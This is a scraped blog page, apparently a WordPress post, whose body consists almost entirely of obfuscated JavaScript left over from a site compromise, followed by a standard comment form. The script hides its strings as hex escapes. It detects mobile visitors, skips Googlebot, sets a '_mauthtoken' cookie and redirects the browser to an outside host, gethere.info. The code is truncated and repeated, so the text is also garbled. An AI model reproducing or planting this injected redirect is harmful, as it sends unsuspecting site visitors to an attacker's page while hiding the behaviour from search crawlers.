wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s